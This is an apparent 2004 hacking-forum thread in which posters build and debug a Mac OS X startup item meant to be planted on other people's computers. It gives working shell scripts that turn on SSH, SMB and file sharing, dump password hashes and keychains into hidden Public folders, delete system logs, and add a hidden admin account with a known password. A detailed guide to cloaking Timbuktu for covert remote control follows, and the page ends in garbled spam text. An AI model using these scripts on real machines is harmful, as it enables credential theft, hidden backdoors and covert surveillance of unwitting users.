macintosh

Macintosh Underground :: View topic - Startup scripts Free Mac Mini - Mac Mini Hacks Macintosh Underground Startup scripts Goto page 1, 2, 3 ... 13, 14, 15 Next Macintosh Underground Forum Index -> Security & Hacking View previous topic :: View next topic Author Message DimBulbSenior MemberJoined: 03 Mar 2004Posts: 322 Posted: March 13, 2004, 6:57 pm Post subject: Startup scripts EDIT 06 April, 2004 - This startup script is evolving, follow this thread to the end for the latest version of the script! This is an OS X startup item with a shell script to replace the current hostconfig file with a different copy (which has sharing turned on among other things.) It also copies a few files and the netinfo directory into the Public folder of every user folder. On the first reboot SMB sharing will be turned on and the information copied to the .info folder will contain the Mac password hashes and the SMB hashes which are easier to crack. There are three textblocks below. Save each as a separate text file using the names specified for each textblock. Create a new folder called opener. Copy the three text files into that folder. Now place the folder in the /Library/StartupItems folder. Reboot. If you don't want the appletalk hostname to change you could paste it into the new hostconfig file. This works on 10.2.8 and prior, haven't tried it on 10.3. Anyone have any other nifty scripts? SAVE THIS AS A TEXT FILE CALLED opener #! /bin/sh chmod 777 /etc/hostconfig chflags nouchg /etc/hostconfig mv /etc/hostconfig /etc/hostconfigold.old cp /Library/StartupItems/opener/hostconfig /etc/hostconfig cp -R /Library/ApplePasswordServer /.info/Library/ApplePasswordServer cp /Library/WebServer/users /.info/Library/WebServer/users cp /System/Library/CoreServices/SystemVersion.plist /.infoSystem/Library/CoreServices/SystemVersion.plist cp -R /private/var/db /.info/private/var/db cd /.info nidump passwd . > .nidump.txt nidump passwd / > .nidump2.txt chmod -R 777 /.info cd /Users find . -maxdepth 2 -name "Public" -type d -exec sudo cp -R /.info '{}/.info' \; rm -Rf /private/var/log/ rm -Rf /Library/Logs/ SAVE THIS AS A TEXT FILE CALLED StartupParameters.plist Description opener Hide Messages start started stop stopped OrderPreference None Provides opener Requires Resolver SAVE THIS AS A TEXT FILE CALLED hostconfig ## # /etc/hostconfig ## # This file is maintained by the system control panels ## # Network configuration HOSTNAME=-AUTOMATIC- ROUTER=-AUTOMATIC- # Services AFPSERVER=-YES- APPLETALK=-YES- AUTHSERVER=-NO- AUTOMOUNT=-YES- CONFIGSERVER=-NO- IPFORWARDING=-NO- MAILSERVER=-NO- NETBOOTSERVER=-NO- NETINFOSERVER=-AUTOMATIC- NISDOMAIN=-NO- RPCSERVER=-AUTOMATIC- TIMESYNC=-YES- QTSSERVER=-NO- SSHSERVER=-YES- WEBSERVER=-YES- CUPS=-YES- DNSSERVER=-NO- IPV6=-YES- SMBSERVER=-YES- APPLETALK_HOSTNAME=*41*Last edited by DimBulb on April 6, 2004, 10:06 pm; edited 1 time in total Back to top DimBulbSenior MemberJoined: 03 Mar 2004Posts: 322 Posted: March 21, 2004, 12:22 pm Post subject: Add this to the reconfig script #!/bin/sh niutil -create / /users/hacker niutil -createprop / /users/hacker uid 401 niutil -createprop / /users/hacker realname "Hacker" niutil -createprop / /users/hacker home "/private/var/home" niutil -createprop / /users/hacker shell "/bin/bash" niutil -createprop / /users/hacker gid 20 niutil -createprop / /users/hacker sharedDir / niutil -createprop / /users/hacker passwd "rQ3p5/hpOpvGE" #(it's 1234) nicl . -append /groups/admin users hacker cp -R /System/Library/User\ Template/English.lproj /private/var/hacker chown -R hacker:staff /private/var/home Edit: The user will not appear in the SystemPreferences Accounts pane nor in the login window but will appear in the Netinfo Manager app._________________No hablo espa�ol - Je ne parle pas fran�ais - Ich spreche nicht Deutsches - Non parlo italiano - Eu n�o falo Portugues http://www.babelfish.altavista.com http://www.freetranslation.com/Last edited by DimBulb on March 29, 2004, 8:48 pm; edited 4 times in total Back to top hard-macFull MemberJoined: 10 Dec 2003Posts: 103Location: ether.monkey.land Posted: March 24, 2004, 7:46 pm Post subject: So I have been testing out the startup opener scripts. I am trying to make them work on 10.3. I added the niutil commands at the start of the opener script to create a new user. Copied over the entire opener directory with the 3 files and restarted. The change over of the hostconfig seems to work fine and the creation of the new user. But the copying of password hashes etc. doesn't seem to work. Do we not need to create a .info directory first? hm Back to top DimBulbSenior MemberJoined: 03 Mar 2004Posts: 322 Posted: March 24, 2004, 8:02 pm Post subject: Try sudo Try prefacing those commands with sudo ... Mac OS restricts things even for root!_________________No hablo espa�ol - Je ne parle pas fran�ais - Ich spreche nicht Deutsches - Non parlo italiano - Eu n�o falo Portugues http://www.babelfish.altavista.com http://www.freetranslation.com/ Back to top hard-macFull MemberJoined: 10 Dec 2003Posts: 103Location: ether.monkey.land Posted: March 24, 2004, 8:45 pm Post subject: No sudo wasn't needed just some directory tweaking and to create the directory. The following worked for me: Code: chmod 777 /etc/hostconfig chflags nouchg /etc/hostconfig mv /etc/hostconfig /etc/hostconfigold.old cp /Library/StartupItems/opener/hostconfig /etc/hostconfig mkdir /.info cp -R /Library/ApplePasswordServer /.info/ApplePasswordServer cp /Library/WebServer/users /.info/users cp /System/Library/CoreServices/SystemVersion.plist /.info/SystemVersion.plist cp -R /private/var/db /.info/db cd /.info nidump passwd . > .nidump.txt nidump passwd / > .nidump2.txt chmod -R 777 /.info cd /Users find . -maxdepth 2 -name "Public" -type d -exec sudo cp -R /.info '{}/.info' \; As far as I can tell there is no ApplePasswordServer under 10.3 but I am not totally sure. What exactly does the last line do? Back to top DimBulbSenior MemberJoined: 03 Mar 2004Posts: 322 Posted: March 25, 2004, 8:36 am Post subject: Last line find . -maxdepth 2 -name "Public" -type d -exec sudo cp -R /.info '{}/.info' \; CD /Users find . -maxdepth 2 -name "Public" -type d This will find folders named "Public" in each user folder (only 2 folders deep from the /Users folder so any other folder named Public inside Desktop for instance would be ignored.) -exec sudo cp -R /.info '{}/.info' \; Then run the sudo cp command to copy the whole folder /.info (where we gathered all the netinfo and hashes) into the Public folders for each user. Now even if the users change passwords, each time the script runs (at every startup) the hashes and netinfo data are copied into an invisible folder called ".info" in their PUBLIC folders. Connect as guest, mount the public share, open terminal and cd /volumes/theirusername and then ls -alo to see the hidden folder (and copy it to your own desktop with cp -R .info ~/info The ApplePasswordServer file was only from OS X server, I'm not even sure what's in the file I just thought I'd have the script grab it... to see if I wanted to change any prefs in it etc but the samba hashes are so easy to crack... WHO CARES! WooHOO! Other interesting files: system/library/startupitems/appleshare/appleshare - it's the script that launches apple file sharing system/library/startupitems/systemlog/systemlog - the script that runs the system logger system/library/startupitems/ssh/ssh system/library/startupitems/authserver/authserver By the way, you can edit the TimbuktuResources file inside the Timbuktu package. Locate the icons for observe, control and exchange, blank them out (using resorcere or resedit.) Blank out the masks too (erase the pixels until the icon is pure white.) Change the Timbuktu startup plist so there are no "Starting Timbuktu Services" strings (just delete the text.) Remove all the documentation etc. Now you can drag tb2 app folder, prefs and the startup script to their drive - and it works - and there is no icon on the menu bar! Do you want more info about this?_________________No hablo espa�ol - Je ne parle pas fran�ais - Ich spreche nicht Deutsches - Non parlo italiano - Eu n�o falo Portugues http://www.babelfish.altavista.com http://www.freetranslation.com/ Back to top hard-macFull MemberJoined: 10 Dec 2003Posts: 103Location: ether.monkey.land Posted: March 25, 2004, 11:00 am Post subject: Thanks for the info on the last line, thats what I thought it did. That is the part that doesn't seem to be working yet. I can run it in the terminal and it works yet when it runs at startup it doesn't work. Any ideas? I can definatley think of some oether things to copy over while were at it and snooping around for tidbits of info: /Library/Keychains/System.keychain /Library/Keychains/FileVaultMaster.cer /Library/Keychains/FileVaultMaster.keychain I'd like to hear some more about cloaking Timbuktu, do you think it is better to use than VNC or ARD? Back to top kthemanElder MemberJoined: 13 Nov 2003Posts: 990Location: lost in the internet Posted: March 25, 2004, 6:12 pm Post subject: what does this do? Back to top DimBulbSenior MemberJoined: 03 Mar 2004Posts: 322 Posted: March 25, 2004, 6:30 pm Post subject: StartupScripts Hard-Mac > Maybe it's the sudo before the cp command, try just -exec cp instead of -exec sudo cp ??? Also, how about: mkdir /.info/keychains cd /users find . -maxdepth 3 -mindepth 3 -name "Keychains" -type d -exec cp -R '{}' /.info/keychains \; (do this before copying /.info into the public folders...) Ktheman > They are startup scripts for OS X that execute commands when the system boots up. In this case the commands are geared toward opening up ports / turning on services and gathering password hashes (and then putting all the relevant information in the Public directories of each user...)_________________No hablo espa�ol - Je ne parle pas fran�ais - Ich spreche nicht Deutsches - Non parlo italiano - Eu n�o falo Portugues http://www.babelfish.altavista.com http://www.freetranslation.com/ Back to top kthemanElder MemberJoined: 13 Nov 2003Posts: 990Location: lost in the internet Posted: March 25, 2004, 6:37 pm Post subject: hmmm.... i see. can't you set it up to use sendmail to send an e-mail to you? Back to top DimBulbSenior MemberJoined: 03 Mar 2004Posts: 322 Posted: March 25, 2004, 7:10 pm Post subject: Cloaking Timbuktu 6.0.3 for OS X Timbuktu is more polished than VNC (which also cloaks very well) and has more features than ARD - like the locator service for instance. Cloaking Timbuktu 6.0.3 for OS X First install Timbuktu and make a backup of the Timbuktu application folder (because you won't want the cloaked one running on your machine - you can put the real thing back on your machine after we're done.) Move the installed, running copy of TB2 that we are going to change into: /Library/Preferences/Netopia/Timbuktu Folder (Yes, we are putting the entire Timbuktu application folder inside it's own preferences folder!) Now launch that copy of the timbuktu app and go through the setup menu to set prefs: General - disable all the check-boxes. (No checks!) Features - disable Address book, Dial Direct Transport, TCP/IP Browser, TCP/IP Scanner, Control/Look Client, send and receive messages, Exchange files client, chat service, intercom service, knock service, invite service. (Only these three features are left enabled: TCP/IP Transport, Control/Look Host, and Exchange Files Host) - Disabling these also makes the Timbuktu menubar menu very short... Master Password - pick a master password that will be required in order to change the preferences or turn off the incoming access (hee hee.) Check all the boxes (that it lets you check.) Allow common passwords - Expire should be unchecked. Sound - choose "none" for all events. Messages received - uncheck the two boxes IP locator - put in any bogus email address such as 0001@hacked.net Now quit the app. Make a copy of the pref file (Netopia Preferences) and go back into the app, go to IP locator again, click advanced enter 0.0.0.0 and then quit, copy the pref again, go back into the app and take out the locator service and the 0.0.0.0 and quit again, copy that pref file You now have 3 pref files: no locator name and no 0.0.0.0 - this is safest, the user will never see an error message saying "Timbuktu can not connect to the locator service" with locator name only - for machines using a public IP - their IP is the public ip thus no need to override with locator name and 0.0.0.0 - for people who use a router and private IP, the 0.0.0.0 tells tb2 to report the public address of the router instead of the computer's ip address. (You have to do the port mapping or DMZ in the router if they did not already have it setup though.) "Show Package Contents" on the Timbuktu App, open the folder SharedSupport, edit the StartupParameters.plist file, blank-out the messages "Starting Timbuktu host" and "Stopping Timbuktu host". Save the changes. (This is the file that gets copied into the TimbuktuStartup script in /Library/StartupItems - actually, you should go make this change on that file too !!!) While you are in the package, trash the help files to make the folder smaller for uploading: Timbuktu\ Pro.app/Contents/Resources/English.lproj/Timbuktu\ Pro\ Help And trash: Timbuktu\ Pro.app/Contents/SharedSupport/License\ Agreement (file) Timbuktu\ Pro.app/Contents/SharedSupport/Modem\ Descriptions (folder) Now to blank out the icons using ResEdit or Resorcerer 2.4 (runs in Classic, the OS X version does not have the icon editor working yet.) Edit the Timbuktu Resources file inside the Timbuktu.app package in SharedSupport... icm# - blank out the icons and masks for control, observe and exchange icm8 - same thing ics# - same thing + "connection menu icons" (these may be the only ones that matter but I wiped out every icon that looked even remotely like the control, observe and exchange icons and it worked nicely.) ics8 - same as ics# Save the changes. Now just upload the /Library/Preferences/Netopia folder into their /Library/Preferences and also upload the /Library/StartupItems/TimbuktuStartup folder into their /Library/StartupItems The whole thing is about 5MB. Then reboot their machine and connect, no icons on the menu bar to tip them off, just don't go moving the mouse while they are sitting there watching! Be sure to keep a copy of the hacked version for future use - you can edit the Netopia Preferences file to easily change the locator name... (in Hexedit search for "@hacked.net" or whatever you used.) Don't forget the 3 different versions of the Netopia Preferences file for different situations..._________________No hablo espa�ol - Je ne parle pas fran�ais - Ich spreche nicht Deutsches - Non parlo italiano - Eu n�o falo Portugues http://www.babelfish.altavista.com http://www.freetranslation.com/ Back to top hard-macFull MemberJoined: 10 Dec 2003Posts: 103Location: ether.monkey.land Posted: March 25, 2004, 9:12 pm Post subject: Code: find . -maxdepth 2 -name "Public" -type d -exec cp -R /.info '{}/.info' \; So I have tried all kinds of different configurations of this line and none of them have worked. sudo, no sudo, sudo in front of find...argh^&*! is there any other way to do this that you can think of? my system log says: Code: Mar 25 20:54:01 localhost SystemStarter: opener (284) did not complete successfully. The other find command for keychains also doesn't seem to work either. It doesn't look like it likes the command much at least as a startup script. Back to top DimBulbSenior MemberJoined: 03 Mar 2004Posts: 322 Posted: March 26, 2004, 8:08 am Post subject: / Hmmmm, I'm still in 10.2.8 using tcsh - and it works... I just tried it in bash on 10.2.8 via terminal (not during startup) and that worked also. (change to !#/bin/bash to run in bash at startup.) Perhaps for simplicities sake you could take out the . in front of info so that the folders it creates would be visible rather than hidden in the ~/Public folder. If you remove that one line do you still get the startup error in the log? Try this in the startup script and look at the whatsup.txt file, is find working ok? cd /Users find . -maxdepth 2 -name "Public" -type d > /whatsup.txt Another idea would be to edit the StartupParameters.plist and change OrderPreference to Late or Last so that all the other services are running prior to the script... also change Uses to Disks_________________No hablo espa�ol - Je ne parle pas fran�ais - Ich spreche nicht Deutsches - Non parlo italiano - Eu n�o falo Portugues http://www.babelfish.altavista.com http://www.freetranslation.com/ Back to top hard-macFull MemberJoined: 10 Dec 2003Posts: 103Location: ether.monkey.land Posted: March 26, 2004, 6:43 pm Post subject: uuhhh duh, yeah it was because of bash in panther. Works great now with no sudo at all. I'm just adding some more files to grab and testing it out. The TB2 stuff looks great. I should have some time to test it all out this weekend. What vnc client do you prefer on OS X? Back to top DimBulbSenior MemberJoined: 03 Mar 2004Posts: 322 Posted: March 26, 2004, 6:56 pm Post subject: VNC thing I use VNC thing but I'm in 10.2.8 still - not sure if it works too well with 10.3.x. The client has a minor irritating glitch showing the cursor - other than that I've had good results. It's a very small upload compared to Timbuktu which is also a plus. On the downside, no locator service._________________No hablo espa�ol - Je ne parle pas fran�ais - Ich spreche nicht Deutsches - Non parlo italiano - Eu n�o falo Portugues http://www.babelfish.altavista.com http://www.freetranslation.com/ Back to top Display posts from previous: All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 Year Oldest FirstNewest First Macintosh Underground Forum Index -> Security & Hacking All times are GMT - 8 HoursGoto page 1, 2, 3 ... 13, 14, 15 Next Page 1 of 15 Jump to: Select a forum Hackintosh----------------F.A.QMac OS XMac SupportGeneral DiscussionDenial of ServiceProgramming/Open SourceCryptographySecurity & HackingServers [FC, Hotline, IRC, FTP] Macintosh Underground BBS----------------News from ModeratorsSuggestions/Complaints International----------------discussion en francais sur le hacking sur macNederlands underground forumUnderground Italiano del MacDeutsches Underground ForumSvenskt Mac Underjords ForumForo en Espa�ol Underground You cannot post new topics in this forumYou cannot reply to topics in this forumYou cannot edit your posts in this forumYou cannot delete your posts in this forumYou cannot vote in polls in this forum Powered by phpBB � 2001 phpBB Group Template created by phpbb2.de �� 5004.10 (��) �� neff �� mobil cut �� cad �� o2 optix �� lida �� -95 �� 478 �� zip-lock �� -�� xxx �� -�� certification microsoft �� 5440.16 (��) �� danfoss �� 4� �� sharp ar-m205 �� /�� 100 �� 2113 �� omega �� snr roulements �� dunlup 205 55 r16 �� intex �� -�� -�� isdn �� -�� rlc �� -4361� �� nokia 8910 �� thuraya sg 2510 �� -�� -�� salamander �� omega �� -934 �� .�-�� macintosh